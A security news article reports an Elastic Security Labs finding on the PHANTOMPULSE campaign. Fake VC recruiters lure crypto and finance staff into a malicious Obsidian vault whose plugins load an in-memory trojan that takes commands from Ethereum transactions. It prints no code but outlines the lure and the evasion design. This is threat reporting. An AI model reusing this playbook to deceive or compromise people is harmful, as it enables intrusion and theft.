- Trending
- Comments
- Latest
Researchers at Elastic Security Labs have identified an active malware campaign that uses fake venture capital recruiters on LinkedIn and Telegram to trick finance and crypto workers into installing malicious plugins inside the Obsidian note-taking app, then routes its command infrastructure through Ethereum blockchain transactions to evade takedown.
At the center of the campaign is a carefully orchestrated social engineering strategy designed to deliver PHANTOMPULSE malware without exploiting software vulnerabilities. Attackers pose as a venture capital firm, initiating contact with targets on LinkedIn before moving conversations to Telegram groups populated by multiple fake “partners.”
Victims are then invited to access what is presented as a company “management database” hosted on Obsidian. They are provided login credentials to a cloud-synced vault controlled by the attackers. Once access is granted, victims are instructed to enable community plugin synchronization—an action that unknowingly triggers the execution of malicious code.
According to Elastic Security Labs, the attackers abused legitimate plugins, including Shell Commands and Hider, to execute payloads when the vault is opened.
“Elastic Security Labs has identified a novel social engineering campaign that abuses the popular note-taking application, Obsidian, as an initial access vector,” — Elastic Security Labs, in its threat report.
This approach allows PHANTOMPULSE malware to operate under the guise of legitimate application behavior, making detection significantly more difficult.
Once activated, the PHANTOMPULSE malware attack chain unfolds in multiple stages across both Windows and macOS systems. On Windows, the process begins with a PowerShell command executed via the compromised plugin, which downloads a secondary script from a remote server.
This script retrieves a loader known as PHANTOMPULL, which decrypts and injects the PHANTOMPULSE malware payload directly into memory using AES-256-CBC encryption. The malware avoids writing files to disk, relying instead on reflective loading techniques to remain stealthy.
The researchers described the malware as highly sophisticated, noting its AI-assisted development and advanced evasion capabilities.
“The chain culminates in the deployment of a previously undocumented RAT we are naming PHANTOMPULSE,” — Elastic Security Labs, Threat Intelligence Report.
On macOS, the attack employs an obfuscated AppleScript dropper that establishes persistence through LaunchAgents and retrieves additional payloads via remote command-and-control (C2) infrastructure.
One of the most notable features of PHANTOMPULSE malware is its decentralized command-and-control mechanism. Instead of relying solely on traditional servers, the malware retrieves its C2 instructions from blockchain transaction data.
Specifically, it queries Ethereum-compatible block explorers to extract encoded instructions from transaction input fields tied to a hardcoded wallet address. This allows attackers to update control servers dynamically without relying on fixed infrastructure.
However, researchers identified a critical flaw in this design.
“We identified a weakness in the C2 mechanism that allows for a takeover of the implants by responders,” — Elastic Security Labs, Threat Intelligence Report.
Because the malware does not verify the origin of blockchain transactions, security researchers or even third parties can potentially hijack infected systems by submitting newer transactions with alternative instructions.
The PHANTOMPULSE malware campaign reflects a broader shift in cyber threats, where attackers increasingly rely on human manipulation rather than technical exploits. By leveraging trusted platforms like Obsidian, the attackers bypass conventional antivirus detection and gain execution through legitimate application features.
Elastic Defend successfully detected and blocked the attack during early-stage execution in the observed case, preventing full deployment of the PHANTOMPULSE malware payload. The detection was triggered by suspicious PowerShell activity originating from the Obsidian process.
Despite this, the campaign highlights the risks facing organizations in high-value sectors such as finance and cryptocurrency, where employees are frequent targets of sophisticated social engineering.
The researchers emphasized that even secure and widely trusted tools can become attack vectors if misused.
Copyright © 2025 - The Bit Gazette.
